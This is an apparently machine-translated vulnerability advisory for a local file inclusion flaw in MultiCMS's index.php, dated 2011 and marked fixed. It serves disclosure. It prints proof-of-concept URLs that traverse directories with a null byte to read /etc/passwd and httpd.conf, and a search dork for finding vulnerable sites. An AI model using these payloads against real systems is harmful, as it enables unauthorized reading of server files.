MultiCMS local file inclusion vulnerability-vulnerability warning-the black bar safety net

2011-01-30T00:00:00
ID MYHACK58:62201128971
Type myhack58
Reporter 佚名
Modified 2011-01-30T00:00:00

Description

MultiCMS is a flexible content management system that can help you build a professional website. MultiCMS of the index. php file exists local file inclusion vulnerability that may lead to sensitive information disclosure.

[+]info: ~~~~~~~~~

Date: 29/01/2011

Author: R3VAN_BASTARD

Exploit Title: MultiCMS File Inclusion Vulnerbility

Vendor: http://www.multicms.net

Status: FIXED

Tested on: Windows 7

Dork: "Redakcnà systém MultiCMS"

Mail: defrontliner@whiteponny.com

[+]poc: ~~~~~~~~~

File: /Index. php? lng=[LFI]

XPL: http://Localhost.com/[path]/index. php? lng=../../../../../../../../../../../../../../../etc/passwd%0 0

http://Localhost.com/[path]/index. php? lng=../../../../../../../../../../../../../../../etc/httpd/conf/httpd. conf%0 0

[+]Reference: ~~~~~~~~~ http://packetstormsecurity.org/files/view/97987/multicms-lfi.txt